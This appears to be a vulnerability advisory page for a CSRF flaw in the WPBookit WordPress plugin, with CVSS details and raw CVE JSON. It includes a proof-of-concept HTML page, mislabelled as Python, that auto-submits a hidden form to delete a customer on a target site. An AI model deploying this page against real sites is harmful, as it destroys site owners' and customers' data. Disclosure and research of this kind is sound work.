Security Vulnerability Report
中文
CVE-2025-12685 CVSS 6.5 MEDIUM

CVE-2025-12685

Published: 2026-01-02 06:15:53
Last Modified: 2026-04-15 00:35:42

Description

The WPBookit WordPress plugin through 1.0.7 lacks a CSRF check when deleting customers. This could allow an unauthenticated attacker to delete any customer through a CSRF attack.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WPBookit WordPress plugin <= 1.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-12685: Delete customer via CSRF --> <!DOCTYPE html> <html> <head> <title>Customer Deletion Request</title> </head> <body> <h1>Processing your request...</h1> <!-- Form to delete customer with ID=1 --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" target="_blank"> <input type="hidden" name="action" value="wpb_delete_customer"> <input type="hidden" name="customer_id" value="1"> <input type="hidden" name="_wpnonce" value=""> </form> <script> // Auto-submit the form when page loads document.addEventListener('DOMContentLoaded', function() { document.getElementById('csrfForm').submit(); }); </script> <p>If not redirected, <a href="javascript:document.getElementById('csrfForm').submit();">click here</a>.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12685", "sourceIdentifier": "[email protected]", "published": "2026-01-02T06:15:53.283", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPBookit WordPress plugin through 1.0.7 lacks a CSRF check when deleting customers. This could allow an unauthenticated attacker to delete any customer through a CSRF attack."}, {"lang": "es", "value": "El plugin de WordPress WPBookit hasta la versión 1.0.7 carece de una verificación CSRF al eliminar clientes. Esto podría permitir a un atacante no autenticado eliminar cualquier cliente mediante un ataque CSRF."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "references": [{"url": "https://wpscan.com/vulnerability/e5ba488a-b43d-4c5f-9716-4b24701999f3/", "source": "[email protected]"}]}}